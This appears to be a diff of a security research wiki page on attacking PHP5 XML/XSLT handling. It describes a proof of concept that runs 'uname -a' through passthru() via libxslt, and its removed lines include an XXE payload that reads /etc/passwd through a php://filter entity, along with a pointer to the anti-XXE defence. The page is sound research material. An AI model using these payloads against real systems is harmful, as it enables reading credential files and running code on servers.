Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29

From version

20.1

edited by Nicolas Gregoire
on 2012/02/02 17:29

Change comment: There is no comment for this version

To version

edited by Nicolas Gregoire
on 2012/01/18 22:39

Change comment: There is no comment for this version

Summary

Page properties

Content

@@ -25,17 +25,3 @@
  | http:~/~/php.net/xsl| Any PHP function|[[execute-code-via-libxslt.php>>attach:execute-code-via-libxslt.php]]| A call to registerPHPFunctions() is needed
  The attached [[execute-code-via-libxslt.php>>attach:execute-code-via-libxslt.php]] PoC will use the passthru() PHP function to execute "uname -a".
--
--= Reading binary files via PHP filters =
--
--{{warning}}
--Untested : could we read binary files too ?
--{{/warning}}
--
--<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
--<scan>&test;</scan>
--Source : http://www.idontplaydarts.com/2011/02/scanning-the-internal-network-using-simplexml/
--
--= Anti XEE =
--
--http://www.php.net/manual/en/function.libxml-disable-entity-loader.php